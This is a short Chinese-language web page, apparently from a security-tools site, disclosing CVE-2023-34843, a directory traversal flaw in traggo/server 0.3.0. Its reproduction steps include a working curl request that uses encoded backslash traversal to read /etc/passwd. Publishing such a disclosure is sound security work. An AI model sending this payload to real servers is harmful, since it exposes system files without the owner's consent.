黑客、渗透测试和网络安全工具,武装您的安全武器库!
CVE-2023-34843 的公开披露。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
CVE-2023-34843 漏洞披露
traggo/server 0.3.0 版本存在目录遍历漏洞。
复现步骤:
在你的端点/服务器上搭建 traggo/server。 https://traggo.net/install/
向以下 URL 发起 GET 请求。 curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
查看 /etc/passwd 的内容